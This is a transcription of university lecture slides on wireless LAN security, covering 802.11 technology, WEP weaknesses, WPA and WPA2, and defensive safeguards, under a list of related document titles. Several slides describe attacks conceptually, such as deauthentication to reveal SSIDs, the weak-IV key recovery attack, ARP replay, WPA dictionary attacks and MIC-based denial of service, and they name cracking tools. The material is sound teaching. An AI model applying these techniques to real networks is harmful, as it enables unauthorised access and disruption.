WLAN Security - Contents. Wireless LAN Security. WLAN Technologies. The ISM Frequency Bands

Similar documents
Outline : Wireless Networks Lecture 10: Management. Management and Control Services : Infrastructure Reminder.

Wireless technology Principles of Security

A Configuration Protocol for Embedded Devices on Secure Wireless Networks

Wireless Security Protocol Analysis and Design. Artoré & Bizollon : Wireless Security Protocol Analysis and Design

Wireless Networking Basics. Ed Crowley

Appendix E Wireless Networking Basics

CS-435 spring semester Network Technology & Programming Laboratory. Stefanos Papadakis & Manolis Spanakis

Wireless Technologies

Wireless Networks. Authors: Marius Popovici Daniel Crişan Zagham Abbas. Technical University of Cluj-Napoca Group Cluj-Napoca, 24 Nov.

CSNT 180 Wireless Networking. Chapter 7 WLAN Terminology and Technology

Security in IEEE Networks

WLAN Security. รศ. ดร. อน นต ผลเพ ม Asso. Prof. Anan Phonphoem, Ph.D.

Chapter 3.1 Acknowledgment:

1. INTRODUCTION. Wi-Fi 1

Advanced Security and Mobile Networks

CITS3002 Networks and Security. The IEEE Wireless LAN protocol. 1 next CITS3002 help3002 CITS3002 schedule

02/21/08 TDC Branch Offices. Headquarters SOHO. Hot Spots. Home. Wireless LAN. Customer Sites. Convention Centers. Hotel

Guide to Wireless Communications, Third Edition. Objectives

Wireless Attacks and Countermeasures

Managing and Securing Computer Networks. Guy Leduc. Chapter 7: Securing LANs. Chapter goals: security in practice: Security in the data link layer

CYBER ATTACKS EXPLAINED: WIRELESS ATTACKS

Viewing Status and Statistics

Wireless LAN USB Super G 108 Mbit. Manual

Wireless Networking based on Chapter 15 of CompTIA Network+ Exam Guide, 4th ed., Mike Meyers

Wireless# Guide to Wireless Communications. Objectives

Chapter 24 Wireless Network Security

Wireless Security. Comp Sci 3600 Security. Attacks WEP WPA/WPA2. Authentication Encryption Vulnerabilities

Wireless and WiFi. Daniel Zappala. CS 460 Computer Networking Brigham Young University

CIS 551 / TCOM 401 Computer and Network Security. Spring 2007 Lecture 8

What is a Wireless LAN? The wireless telegraph is not difficult to understand. The ordinary telegraph is like a very long cat. You pull the tail in Ne

2013 Summer Camp: Wireless LAN Security Exercises JMU Cyber Defense Boot Camp

Wireless Local Area Networks (WLANs)) and Wireless Sensor Networks (WSNs) Computer Networks: Wireless Networks 1

Last Lecture: Data Link Layer

The 8 th International Scientific Conference DEFENSE RESOURCES MANAGEMENT IN THE 21st CENTURY Braşov, November 14 th 2013

Multiple Access in Cellular and Systems

WNC-0300USB. 11g Wireless USB Adapter USER MANUAL

CSMC 417. Computer Networks Prof. Ashok K Agrawala Ashok Agrawala. Fall 2018 CMSC417 Set 1 1

Wireless LAN -Architecture

Princess Nora Bint Abdulrahman University College of computer and information sciences Networks department Networks Security (NET 536)

Shared Access Networks Wireless. 1/27/14 CS mywireless 1

Wireless Communication and Networking CMPT 371

Wireless# Guide to Wireless Communications. Objectives

Family Structural Overview

Wireless Terms. Uses a Chipping Sequence to Provide Reliable Higher Speed Data Communications Than FHSS

Wireless Local Area Networks (WLANs) and Wireless Sensor Networks (WSNs) Primer. Computer Networks: Wireless LANs

Wireless LAN. Access Point. Provides network connectivity over wireless media

WLAN Security. Dr. Siwaruk Siwamogsatham. ThaiCERT, NECTEC

Outdoor High Power b/g/n Wireless USB Adapter USER MANUAL 4.0

D. The bank s web server is using an X.509 certificate that is not signed by a root CA, causing the user ID and password to be sent unencrypted.

Wireless Local Area Networks. Networks: Wireless LANs 1

Wireless LANs. ITS 413 Internet Technologies and Applications

WiFi Networks: IEEE b Wireless LANs. Carey Williamson Department of Computer Science University of Calgary Winter 2018

05 - WLAN Encryption and Data Integrity Protocols


Extending or Interconnecting LANS. Physical LAN segment. Virtual LAN. Forwarding Algorithm 11/9/15. segments. VLAN2, Port3. VLAN1, Port1.

How Insecure is Wireless LAN?

WarDriving. related fixed line attacks war dialing port scanning

Chapter 7. Basic Wireless Concepts and Configuration. Part I

Data Communication & Networks G Session 5 - Main Theme Wireless Networks. Dr. Jean-Claude Franchitti

Overview of Security

Expected Outcomes Able to design the network security for the entire network Able to develop and suggest the security plan and policy

Wireless Networks. CSE 3461: Introduction to Computer Networking Reading: , Kurose and Ross

Wireless Security i. Lars Strand lars (at) unik no June 2004

Institute of Electrical and Electronics Engineers (IEEE) IEEE standards

Physical and Link Layer Attacks

Mobile and Sensor Systems

Wi-Fi Scanner. Glossary. LizardSystems

Wireless Networking. Chapter The McGraw-Hill Companies, Inc. All rights reserved

Overview : Computer Networking. Spectrum Use Comments. Spectrum Allocation in US Link layer challenges and WiFi WiFi

Wireless Challenges : Computer Networking. Overview. Routing to Mobile Nodes. Lecture 25: Wireless Networking

Mobile MOUSe WIRELESS TECHNOLOGY SPECIALIST ONLINE COURSE OUTLINE

Vendor: HP. Exam Code: HP2-Z32. Exam Name: Implementing HP MSM Wireless Networks. Version: Demo

Past, Present, and Future WiFi Standards and Technologies. Max Slater Davidson Academy of Nevada

IEEE WLANs (WiFi) Part II/III System Overview and MAC Layer

Wireless and Mobile Networks 7-2

CSCD 433/533 Advanced Networking

CS263: Wireless Communications and Sensor Networks

CS4/MSc Computer Networking. Lecture 12: Wireless Local Area Networks

CSC 4900 Computer Networks: Wireless Networks

Wireless MAXg Technology

based on Chapter 15 of CompTIA Network+ Exam Guide, 4th ed., Mike Meyers

Architecture. Copyright :I1996 IEEE. All rights reserved. This contains parts from an unapproved draft, subject to change

Wireless PCI PCMCIA Super G 108 Mbit. Manual

MSIT 413: Wireless Technologies Week 8

04/11/2011. Wireless LANs. CSE 3213 Fall November Overview

Interworking Evaluation of current security mechanisms and lacks in wireless and Bluetooth networks ...

CSC344 Wireless and Mobile Computing. Department of Computer Science COMSATS Institute of Information Technology

Topics for Today. More on Ethernet. Wireless LANs Readings. Topology and Wiring Switched Ethernet Fast Ethernet Gigabit Ethernet. 4.3 to 4.

3.1. Introduction to WLAN IEEE

Wireless Network Security

U S E R M A N U A L b/g PC CARD

6.9 Summary. 11/20/2013 Wireless and Mobile Networks (SSL) 6-1. Characteristics of selected wireless link standards a, g point-to-point

QuickSpecs. HP enterprise access point WL520. Overview

Data and Computer Communications. Chapter 13 Wireless LANs

Network+ Guide to Networks 6 th Edition. Chapter 8 Wireless Networking

Wireless Local Area Network (IEEE )

300M Wireless-N Mini USB Adapter

Wireless Communication and Networking CMPT 371

Chapter 10: Wireless LAN & VLANs

IEEE Technical Tutorial. Introduction. IEEE Architecture

Transcription:

WLAN Security - Contents Wireless LAN Security Matthew Joyce Vodafone UK > WLAN Technologies > Wireless LAN 802.11 >Technology >Security History > Vulnerabilities > Demonstration IY5511-08 WLAN Security 1 IY5511-08 WLAN Security 2 WLAN Technologies The ISM Frequency Bands Infrared Wireless LAN LAN Technologies Narrow Band Direct Sequence Spread Spectrum Frequency Hopping IY5511-08 WLAN Security 3 1 2 3 1 2 3 4 6 810 20 30 40 60 100 GHz Selected regional licensing differences: 915 MHz only in the Americas (region 2) 2.4 GHz for global availability (region 1,2,3) Unlicensed spectrum is difficult to come by and usually contested IY5511-08 WLAN Security 4

CODE Multiple Access Methods TIME 1 2 3 FDMA User 3 User 2 User 1 Each user assigned a different frequency - like ordinary radio FREQUENCY TIME TIME User 3 User 2 User 1 TDMA FREQUENCY Multiple users share the same frequency channel sequentially Time slot sequence repeats over and over Channel is spread over wide frequency band Many users share the same frequency band at the same time Each user is assigned a unique code to identify and separate them Spread Spectrum Communication > Spread spectrum signals have bandwidths much wider than that of the data they carry > This provides the signal with substantial immunity to noise and interference, and to fading and multipath > The use of different basis signals allows many users to exist simultaneously in the same band, hence CDMA FREQUENCY CDMA (also referred to as Spread Spectrum ) IY5511-08 WLAN Security 5 IY5511-08 WLAN Security 6 Spread Spectrum Properties DS and FH Spread Spectrum > Spread spectrum signals may be overlaid on existing services (this is the rule, rather than the exception in the 2.4 GHz ISM band) > The distinctive signals allow each user to be automatically identified > The wide bandwidth of the signals allows multipath diversity to be used > The data rate may be varied to adapt gracefully to changing load conditions > Frequency Hopping > Sequential use of multiple frequencies > Hop sequence and rate will vary > Direct Sequence > Each symbol is transmitted over multiple frequencies at the same time > Higher speed than FH at comparable distances > System capacity (multiple channels) higher than FH COMPLETE WAVEBAND ALLOCATED Time Time IY5511-08 WLAN Security 7 IY5511-08 WLAN Security 8

DSSS Transmitter Schema DSSS Signal Convolution Source and Channel Coding Code Generator Digital Signal (Bits) Frequency Spectrum Code Bits (Chips) f Multiplier X RF Modulator Spread Frequency Spectrum f Symbol time t s Chip time t c 1 0 X = symbol Barker sequence Result of multiplication > Due to the multiplication of a symbol with Barker code, the rate-of-change increases with a factor 11 in this example > This means that cycle rate increases from 1 MHz to 11 MHz > Spreading: Information signal (I.e. a symbol ) is multiplied by a unique, high rate digital code which stretches (spreads) its bandwidth before transmission. > Code bits are called Chips. > Sequence is sometimes called a Barker Code IY5511-08 WLAN Security 9 2 Mhz 22 Mhz > In terms of spectrum this means that after RF modulation the signal is spread from 2 MHz bandwidth to 22 MHz bandwidth IY5511-08 WLAN Security 10 Data and Spread Signal Spectra DSSS Receiver Schema Information signal Spread signal Multiplied RF X Demodulator Spread Frequency f Spectrum Code Generator Code Bits (Chips) Digital Signal (Bits) De-Spread Signal f Channel and Source Decoding > At the receiver, the spread signal is multiplied again by a synchronized replica of the same code, and is de-spread and recovered > The outcome of the process is the original symbol Chip Rate = 32 IY5511-08 WLAN Security 11 IY5511-08 WLAN Security 12

De-Spreading Effects of Reflections/Echoes +1-1 Direct Sequence Spread Spectrum Signal 11 chip code +11 : Data > When the incoming signal is de-spread, it results in either a positive (+) or a negative (-) spike > These spikes arrive at intervals equal to the symbol time > A positive spike represents a 1 symbol, a negative spike represents a 0 symbol peak echo echo Symbol time > Echoes may arrive at the receiver, fluctuations can be noticed at positions other than at the symbol time boundaries > These fluctuations are (largely) ignored as the receiver will only interpret the spike at the synchronization points (separated from each other by the symbol time) -11 Symbol time IY5511-08 WLAN Security 13 IY5511-08 WLAN Security 14 IEEE 802 The WiFi Context > IEEE 802 is a collection of standards by IEEE that typically get promulgated to ANSI and ISO standards > E.g. IEEE 802.3 specifies the physical and data link layer properties of Ethernet (in its various incarnations) > IEEE 802.11 is a family of standards for wireless local area networks > Baseline IEEE Std 802.11-1997 was approved in June 1997 > Current standard is IEEE Std 802.11-1999, which is supplemented by amendment documents (in the sequence a,b,d,g,h,i, j, and e) and one corrigendum document > IEEE Std 802.11-1999 was reaffirmed by the 802.11 working group in 2003 without changes > A recommended practices document for inter-access-point communication (802.11f) was ratified in 2003 but withdrawn in March 2006 Wireless LANs > IEEE ratified 802.11 in 1997. >Also known as Wi-Fi. > Wireless LAN at 1 Mbps & 2 Mbps. > WECA (Wireless Ethernet Compatibility Alliance) promoted Interoperability. >Now Wi-Fi Alliance > 802.11 provides protocols at Layer 1 & Layer 2 of OSI model. >Physical layer >Data link layer IY5511-08 WLAN Security 15 IY5511-08 WLAN Security 16

802.11 Components 802.11 modes > Two pieces of equipment defined: >Wireless station >A desktop or laptop PC or PDA with a wireless NIC. >Access point >A bridge between wireless and wired networks >Composed of >Radio > Wired network interface (usually 802.3) > Bridging software >Aggregates access for multiple wireless stations to wired network. > Infrastructure mode > Basic Service Set > One access point > Extended Service Set > Two or more BSSs forming a single subnet. > Corporate WLANs operate in this mode. > Ad-hoc mode > Also called peer-to-peer. > Independent Basic Service Set > Set of 802.11 wireless stations that communicate directly without an access point. > Useful for quick & easy wireless networks. IY5511-08 WLAN Security 17 IY5511-08 WLAN Security 18 Infrastructure mode Ad-hoc mode Access Point Basic Service Set (BSS) Single cell Station Extended Service Set (ESS) Multiple cells Independent Basic Service Set (IBSS) IY5511-08 WLAN Security 19 IY5511-08 WLAN Security 20

802.11 Physical Layer > Originally three alternative physical layers >Two incompatible spread-spectrum radio in 2.4Ghz ISM band >Frequency Hopping Spread Spectrum (FHSS) > 75 channels >Direct Sequence Spread Spectrum (DSSS) > 14 channels (11 channels in US) >One diffuse infrared layer > 802.11 speed >1 Mbps or 2 Mbps. 802.11 Data Link Layer > Layer 2 split into: > Logical Link Control (LLC). > Media Access Control (MAC). > LLC - same 48-bit addresses as 802.3. > MAC - CSMA/CD not possible. > Can t listen for collision while transmitting. > CSMA/CA Collision Avoidance. > Sender waits for clear air, waits random time, then sends data. > Receiver sends explicit ACK when data arrives intact. > Also handles interference. > But adds overhead. > 802.11 always slower than equivalent 802.3. IY5511-08 WLAN Security 21 IY5511-08 WLAN Security 22 Hidden nodes RTS / CTS > To handle hidden nodes > Sending station sends > Request to Send > Access point responds with > Clear to Send >All other stations hear this and delay any transmissions. > Only used for larger pieces of data. >When retransmission may waste significant time. IY5511-08 WLAN Security 23 IY5511-08 WLAN Security 24

802.11b Joining a BSS > 802.11b ratified in 1999 adding 5.5 Mbps and 11 Mbps. > DSSS as physical layer. > 11 channels (3 non-overlapping) > Dynamic rate shifting. > Transparent to higher layers > Ideally 11 Mbps. > Shifts down through 5.5 Mbps, 2 Mbps to 1 Mbps. > Higher ranges. > Interference. > Shifts back up when possible. > Maximum specified range 100 metres > Average throughput of 4Mbps > When 802.11 client enters range of one or more APs >APs send beacons. >AP beacon can include SSID. >AP chosen on signal strength and observed error rates. >After AP accepts client. >Client tunes to AP channel. > Periodically, all channels surveyed. >To check for stronger or more reliable APs. >If found, reassociates with new AP. IY5511-08 WLAN Security 25 IY5511-08 WLAN Security 26 Access Point Roaming Roaming and Channels > Reassociation with APs Channel 1 >Moving out of range. >High error rates. >High network traffic. >Allows load balancing. Channel 4 Channel 7 Channel 9 > Each AP has a channel. >14 partially overlapping channels. >Only three channels that have no overlap. >Best for multicell coverage. IY5511-08 WLAN Security 27 IY5511-08 WLAN Security 28

802.11a > 802.11a ratified in 2001 > Supports up to 54Mbps in 5 Ghz range. >Higher frequency limits the range >Regulated frequency reduces interference from other devices > 12 non-overlapping channels > Usable range of 30 metres > Average throughput of 30 Mbps > Not backwards compatible 802.11g > 802.11g ratified in 2002 > Supports up to 54Mbps in 2.4Ghz range. >Backwards compatible with 802.11b > 3 non-overlapping channels > Range similar to 802.11b > Average throughput of 30 Mbps > 802.11n due for November 2006 >Aiming for maximum 200Mbps with average 100Mbps IY5511-08 WLAN Security 29 IY5511-08 WLAN Security 30 Open System Authentication > Service Set Identifier (SSID) > Station must specify SSID to Access Point when requesting association. > Multiple APs with same SSID form Extended Service Set. > APs can broadcast their SSID. > Some clients allow * as SSID. >Associates with strongest AP regardless of SSID. MAC ACLs and SSID hiding > Access points have Access Control Lists (ACL). > ACL is list of allowed MAC addresses. > E.g. Allow access to: > 00:01:42:0E:12:1F > 00:01:42:F1:72:AE > 00:01:42:4F:E2:01 > But MAC addresses are sniffable and spoofable. > AP Beacons without SSID > Essid_jack > sends deauthenticate frames to client > SSID then displayed when client sends reauthenticate frames IY5511-08 WLAN Security 31 IY5511-08 WLAN Security 32

Interception Range Interception Basic Service Set (BSS) Single cell 100 metres Station outside building perimeter. > Wireless LAN uses radio signal. > Not limited to physical building. > Signal is weakened by: >Walls >Floors > Interference > Directional antenna allows interception over longer distances. >Record is 124 miles for an unamplified 802.11b signal (4 metre dish) IY5511-08 WLAN Security 33 IY5511-08 WLAN Security 34 Directional Antenna > Directional antenna provides focused reception. > DIY plans available. > Aluminium cake tin > Chinese cooking sieve > http://www.saunalahti.fi/~elepal/antennie.html > http://www.usbwifi.orcon.net.nz/ WarDriving >Software >Netstumbler >And many more >Laptop > 802.11a,b,g PC card > Optional: >Global Positioning System > Logging of MAC address, network name, SSID, manufacturer, channel, signal strength, noise (GPS - location). IY5511-08 WLAN Security 35 IY5511-08 WLAN Security 36

WarDriving results WarDriving map Source: www.dis.org/wl/maps/ > San Francisco, 2001 >Maximum 55 miles per hour. > 1500 Access Points >60% in default configuration. >Most connected to internal backbones. >85% use Open System Authentication. > Commercial directional antenna >25 mile range from hilltops. > Peter Shipley - http://www.dis.org/filez/openlans.pdf IY5511-08 WLAN Security 37 IY5511-08 WLAN Security 38 Worldwide War Drive 2004 > Fourth and last worldwide war drive > www.worldwidewardrive.org > 228,537 Access points > 82,755 (35%) with default SSID > 140,890 (60%) with Open System Authentication > 62,859 (27%) with both, probably default configuration Further issues > Access Point configuration >Mixtures of SNMP, web, serial, telnet. >Default community strings, default passwords. > Evil Twin Access Points >Stronger signal, capture user authentication. > Renegade Access Points >Unauthorised wireless LANs. IY5511-08 WLAN Security 39 IY5511-08 WLAN Security 40

War Driving prosecutions 802.11b Security Services > February 2004, Texas, Stefan Puffer acquitted of wrongful access after showing an unprotected county WLAN to officials > June 2004, North Carolina, Lowes DIY store > Salcedo convicted for stealing credit card numbers via unprotected WLAN > Botbyl convicted for checking email & web browsing via unprotected WLAN > June 2004, Connecticut, Myron Tereshchuk guilty of drive-by extortion via unprotected WLANs > make the check payable to M.Tereshchuk > July 2005, London, Gregory Straszkiewicz guilty of dishonestly obtaining a communications service > Warwalking in Ealing > Two security services provided: > Authentication >Shared Key Authentication >Encryption >Wired Equivalence Privacy IY5511-08 WLAN Security 41 IY5511-08 WLAN Security 42 Wired Equivalence Privacy > Shared key between >Stations. >An Access Point. > Extended Service Set >All Access Points will have same shared key. > No key management >Shared key entered manually into >Stations >Access points >Key management nightmare in large wireless LANs RC4 > Ron s Code number 4 >Symmetric key encryption >RSA Security Inc. >Designed in 1987. >Trade secret until leak in 1994. > RC4 can use key sizes from 1 bit to 2048 bits. > RC4 generates a stream of pseudo random bits >XORed with plaintext to create ciphertext. IY5511-08 WLAN Security 43 IY5511-08 WLAN Security 44

WEP Sending WEP Encryption > Compute Integrity Check Vector (ICV). > Provides integrity > 32 bit Cyclic Redundancy Check. > Appended to message to create plaintext. > Plaintext encrypted via RC4 > Provides confidentiality. > Plaintext XORed with long key stream of pseudo random bits. > Key stream is function of > 40-bit secret key > 24 bit initialisation vector > Ciphertext is transmitted. Initialisation Vector (IV) Secret key Plaintext PRNG 32 bit CRC IV Cipher text IY5511-08 WLAN Security 45 IY5511-08 WLAN Security 46 WEP Receiving > Ciphertext is received. > Ciphertext decrypted via RC4 >Ciphertext XORed with long key stream of pseudo random bits. >Key stream is function of >40-bit secret key >24 bit initialisation vector (IV) >Check ICV >Separate ICV from message. >Compute ICV for message >Compare with received ICV Shared Key Authentication > When station requests association with Access Point > AP sends random number to station > Station encrypts random number > Uses RC4, 40 bit shared secret key & 24 bit IV > Encrypted random number sent to AP > AP decrypts received message > Uses RC4, 40 bit shared secret key & 24 bit IV > AP compares decrypted random number to transmitted random number > If numbers match, station has shared secret key. IY5511-08 WLAN Security 47 IY5511-08 WLAN Security 48

WEP Safeguards > Shared secret key required for: >Associating with an access point. >Sending data. >Receiving data. > Messages are encrypted. >Confidentiality. > Messages have checksum. >Integrity. > But management traffic still broadcast in clear containing SSID. Initialisation Vector > IV must be different for every message transmitted. > 802.11 standard doesn t specify how IV is calculated. > Wireless cards use several methods >Some use a simple ascending counter for each message. >Some switch between alternate ascending and descending counters. >Some use a pseudo random IV generator. IY5511-08 WLAN Security 49 IY5511-08 WLAN Security 50 Passive WEP attack > If 24 bit IV is an ascending counter, > If Access Point transmits at 11 Mbps, > All IVs are exhausted in roughly 5 hours. > Passive attack: >Attacker collects all traffic >Attacker could collect two messages: >Encrypted with same key and same IV >Statistical attacks to reveal plaintext >Plaintext XOR Ciphertext = Keystream Active WEP attack > If attacker knows plaintext and ciphertext pair >Keystream is known. >Attacker can create correctly encrypted messages. >Access Point is deceived into accepting messages. > Bitflipping >Flip a bit in ciphertext >Bit difference in CRC-32 can be computed IY5511-08 WLAN Security 51 IY5511-08 WLAN Security 52

Limited WEP keys Creating limited WEP keys > Some vendors allow limited WEP keys >User types in a passphrase >WEP key is generated from passphrase >Passphrases creates only 21 bits of entropy in 40 bit key. >Reduces key strength to 21 bits = 2,097,152 >Remaining 19 bits are predictable. >21 bit key can be brute forced in minutes. > www.lava.net/~newsham/wlan/wep_passw ord_cracker.ppt IY5511-08 WLAN Security 53 IY5511-08 WLAN Security 54 Brute force key attack > Capture ciphertext. >IV is included in message. > Search all 2 40 possible secret keys. > 1,099,511,627,776 keys >~170 days on a modern laptop > Find which key decrypts ciphertext to plaintext. 128 bit WEP > Vendors have extended WEP to 128 bit keys. >104 bit secret key. >24 bit IV. > Brute force takes 10^19 years for 104- bit key. > Effectively safeguards against brute force attacks. IY5511-08 WLAN Security 55 IY5511-08 WLAN Security 56

Key Scheduling Weakness > Paper from Fluhrer, Mantin, Shamir, 2001. > Two weaknesses: >Certain keys leak into key stream. >Invariance weakness. >If portion of PRNG input is exposed, >Analysis of initial key stream allows key to be determined. >IV weakness. IY5511-08 WLAN Security 57 IV weakness > WEP exposes part of PRNG input. > IV is transmitted with message. > Every wireless frame has reliable first byte > Sub-network Access Protocol header (SNAP) used in logical link control layer, upper sub-layer of data link layer. > First byte is 0xAA >Attack is: > Capture packets with weak IV > First byte ciphertext XOR 0xAA = First byte key stream > Can determine key from initial key stream > Practical for 40 bit and 128 bit keys > Passive attack. >Non-intrusive. >No warning. IY5511-08 WLAN Security 58 Wepcrack > First tool to demonstrate attack using IV weakness. >Open source, Anton Rager. > Three components > Weaker IV generator. >Search sniffer output for weaker IVs & record 1 st byte. >Cracker to combine weaker IVs and selected 1 st bytes. > Cumbersome. Airsnort > Automated tool >Cypher42, Minnesota, USA. >Does it all! >Sniffs > Searches for weaker IVs >Records encrypted data >Until key is derived. > 100 Mb to 1 Gb of transmitted data. > 3 to 4 hours on a very busy WLAN. IY5511-08 WLAN Security 59 IY5511-08 WLAN Security 60

Avoid the weak IVs Generating WEP traffic > FMS described a simple method to find weak IVs > Many manufacturers avoid those IVs after 2002 > Therefore Airsnort and others may not work on recent hardware > However David Hulton aka h1kari > Properly implemented FMS attack which shows many more weak IVs > Identified IVs that leak into second byte of key stream. > Second byte of SNAP header is also 0xAA > So attack still works on recent hardware > And is faster on older hardware > Dwepcrack, weplab, aircrack > Not capturing enough traffic? >Capture encrypted ARP request packets >Anecdotally lengths of 68, 118 and 368 bytes appear appropriate >Replay encrypted ARP packets to generate encrypted ARP replies >Aireplay implements this. IY5511-08 WLAN Security 61 IY5511-08 WLAN Security 62 802.11 safeguards > Security Policy & Architecture Design > Treat as untrusted LAN > Discover unauthorised use > Access point audits > Station protection > Access point location > Antenna design Security Policy & Architecture > Define use of wireless network >What is allowed >What is not allowed > Holistic architecture and implementation >Consider all threats. >Design entire architecture >To minimise risk. IY5511-08 WLAN Security 63 IY5511-08 WLAN Security 64

Wireless as untrusted LAN > Treat wireless as untrusted. >Similar to Internet. > Firewall between WLAN and Backbone. > Extra authentication required. > Intrusion Detection >at WLAN / Backbone junction. > Vulnerability assessments Discover unauthorised use > Search for unauthorised access points, ad-hoc networks or clients. > Port scanning > For unknown SNMP agents. > For unknown web or telnet interfaces. >Warwalking! > Sniff 802.11 packets > Identify IP addresses > Detect signal strength > But may sniff your neighbours > Wireless Intrusion Detection > AirMagnet, AirDefense, Trapeze, Aruba, IY5511-08 WLAN Security 65 IY5511-08 WLAN Security 66 Access point audits > Review security of access points. > Are passwords and community strings secure? > Use Firewalls & router ACLs >Limit use of access point administration interfaces. > Standard access point config: >SSID >WEP keys >Community string & password policy Station protection > Personal firewalls > Protect the station from attackers. > VPN from station into Intranet > End-to-end encryption into the trusted network. > But consider roaming issues. > Host intrusion detection > Provide early warning of intrusions onto a station. > Configuration scanning > Check that stations are securely configured. IY5511-08 WLAN Security 67 IY5511-08 WLAN Security 68

Location of Access Points > Ideally locate access points >In centre of buildings. > Try to avoid access points >By windows >On external walls >Line of sight to outside > Use directional antenna to point radio signal. Wireless IDS/IPS > Sensors deployed in WLAN > Monitoring to detect >Unauthorised clients by MAC address >Accidental >Malicious >Ad-hoc mode networks >Unauthorised access points >Policy violations > Possible to identify approximate locations IY5511-08 WLAN Security 69 IY5511-08 WLAN Security 70 WPA WPA and 802.1x > Wi-Fi Protected Access > Works with 802.11b, a and g > Fixes WEP s problems > Existing hardware can be used > 802.1x user-level authentication >TKIP > RC4 session-based dynamic encryption keys > Per-packet key derivation > Unicast and broadcast key management > New 48 bit IV with new sequencing method > Michael 8 byte message integrity code (MIC) > Optional AES support to replace RC4 > 802.1x is a general purpose network access control mechanism > WPA has two modes > Pre-shared mode, uses pre-shared keys > Enterprise mode, uses Extensible Authentication Protocol (EAP) with a RADIUS server making the authentication decision > EAP is a transport for authentication, not authentication itself > EAP allows arbitrary authentication methods > For example, Windows supports > EAP-TLS requiring client and server certificates >PEAP-MS-CHAPv2 IY5511-08 WLAN Security 71 IY5511-08 WLAN Security 72

Practical WPA attacks 802.11i (WPA2) > Dictionary attack on pre-shared key mode >CoWPAtty, Joshua Wright > Denial of service attack >If WPA equipment sees two packets with invalid MICs in 1 second >All clients are disassociated >All activity stopped for one minute >Two malicious packets a minute enough to stop a wireless network > Robust Security Network extends WPA > Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP) > Based on a mode of AES, with 128 bits keys and 48 bit IV. > Also adds dynamic negotiation of authentication and encryption algorithms > Allows for future change > Does require new hardware > Lots more info > www.drizzle.com/~aboba/ieee/ IY5511-08 WLAN Security 73 IY5511-08 WLAN Security 74 Relevant RFCs > Radius Extensions: RFC 2869 > EAP: RFC 2284 > EAP-TLS: RFC 2716 Demonstration > War driving > Packet sniffing >Cracking WEP IY5511-08 WLAN Security 75 IY5511-08 WLAN Security 76

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback